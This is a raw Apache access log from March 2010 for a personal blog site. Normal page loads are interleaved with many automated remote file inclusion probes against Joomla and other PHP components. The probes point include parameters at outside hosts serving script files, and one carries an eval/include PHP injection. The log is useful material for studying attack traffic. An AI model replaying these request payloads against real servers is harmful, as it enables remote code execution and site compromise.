165.132.30.11 - - [12/Mar/2010:09:52:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:48 -0800] "GET /logs/access_091205.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:52 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:54 -0800] "GET /blog/index.php/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/ HTTP/1.1" 200 22753 "http://www.zrxoa.org/forums/showthread.php?t=233058" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:54 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:55 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 6637 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:55 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:55 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:56 -0800] "GET /logs/access_090616.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:52:56 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9759 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:53:00 -0800] "GET /logs/access_090616.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:09:53:09 -0800] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:09:53:13 -0800] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:53:17 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20091124 HTTP/1.1" 200 12185 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:53:19 -0800] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
12.11.143.215 - - [12/Mar/2010:09:53:21 -0800] "GET /blog/index.php?slideshow=true&gid=20&184 HTTP/1.1" 200 11455 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:53:32 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:53:55 -0800] "GET /logs/access_080216.log/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:53:55 -0800] "GET /logs/access_090424.log/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:53:56 -0800] "GET /logs/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:53:56 -0800] "GET /cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.30.180.44 - - [12/Mar/2010:09:55:19 -0800] "GET /logs/access_090424.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
217.30.180.44 - - [12/Mar/2010:09:55:19 -0800] "GET /logs/access_090122.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
217.30.180.44 - - [12/Mar/2010:09:55:19 -0800] "GET /logs/access_090424.log%22onmouseover=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:55:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:55:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:55:44 -0800] "GET /logs/access_091211.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:55:44 -0800] "GET /logs/access_091128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:56:09 -0800] "GET /logs/access_091211.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:56:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:56:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:56:09 -0800] "GET /logs/access_091128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:56:12 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:56:51 -0800] "GET /index2.php?lang=' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:56:58 -0800] "GET /logs/access_100211.log//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:57:08 -0800] "GET /logs/access_090617.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:57:10 -0800] "GET /logs/access_090820.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:57:10 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:57:10 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:20 -0800] "GET /logs/access_090819.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:20 -0800] "GET /logs/access_090819.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:20 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:20 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 15063 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:57:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 200 15063 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [12/Mar/2010:09:57:28 -0800] "GET /logs/access_090626.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:57:38 -0800] "GET /logs/access_080103.log//////webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:57:44 -0800] "GET /logs/access_090610.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:57:48 -0800] "GET /?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 200 15135 "-" "libwww-perl/5.831" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:57:50 -0800] "GET /logs/access_081026.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.15.158.246 - - [12/Mar/2010:09:57:56 -0800] "GET /common/db.php?commonpath=http://sample3.itprogram.co.kr//upload/product/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.15.158.246 - - [12/Mar/2010:09:57:56 -0800] "GET /logs/access_081026.log//common/db.php?commonpath=http://sample3.itprogram.co.kr//upload/product/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.15.158.246 - - [12/Mar/2010:09:57:56 -0800] "GET /logs//common/db.php?commonpath=http://sample3.itprogram.co.kr//upload/product/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:08 -0800] "GET /logs/access_090708.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.15.158.246 - - [12/Mar/2010:09:58:12 -0800] "GET /logs/access_081009.log//common/db.php?commonpath=http://sample3.itprogram.co.kr//upload/product/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:58:13 -0800] "GET /logs/access_090620.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:16 -0800] "GET /logs/access_090708.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:58:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:58:19 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:58:24 -0800] "GET /logs/access_080914.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:48 -0800] "GET /logs/access_091115.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:49 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 142818 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [12/Mar/2010:09:58:50 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.1; http://dmulk.com/blog" "dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:50 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 15227 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:50 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 15226 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:51 -0800] "GET /logs/access_091115.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:58:51 -0800] "GET /logs/access_090829.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:58:51 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 200 142818 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:58:57 -0800] "GET /logs/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:58:58 -0800] "GET /cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:58:58 -0800] "GET /logs/access_080216.log%20%20/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:58:58 -0800] "GET /logs/access_090829.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:59:03 -0800] "GET /logs/access_080902.log%20%20///accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:59:03 -0800] "GET /logs///accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:59:03 -0800] "GET //accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:59:04 -0800] "GET /logs/access_081117.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:59:05 -0800] "GET /logs/access_090424.log%20%20/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.222 - - [12/Mar/2010:09:59:05 -0800] "GET /logs/access_090301.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:59:14 -0800] "GET //bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:59:14 -0800] "GET /logs///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:59:14 -0800] "GET /logs/access.log%20%20///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:59:15 -0800] "GET /logs/access_090717.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:09:59:37 -0800] "GET /logs/access_090318.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:59:44 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:59:44 -0800] "GET /logs/access_090703.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:59:44 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:59:48 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:59:48 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:59:48 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:59:49 -0800] "GET /logs/access_090709.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:59:52 -0800] "GET /components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:59:52 -0800] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:59:52 -0800] "GET /logs/access_090516.log%20%20//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [12/Mar/2010:09:59:56 -0800] "GET ///include/mail.inc.php/?skin_board_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [12/Mar/2010:09:59:56 -0800] "GET /logs/access_091002.log%20%20////include/mail.inc.php/?skin_board_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [12/Mar/2010:09:59:56 -0800] "GET /logs////include/mail.inc.php/?skin_board_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:59:57 -0800] "GET /logs/access_100211.log%20%20///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:59:59 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:59:59 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:59:59 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [12/Mar/2010:10:00:08 -0800] "GET /logs/access_081023.log%20%20////include/mail.inc.php/?skin_board_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:00:10 -0800] "GET /logs/access_090614.log///accounts/inc/errors.php?error=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
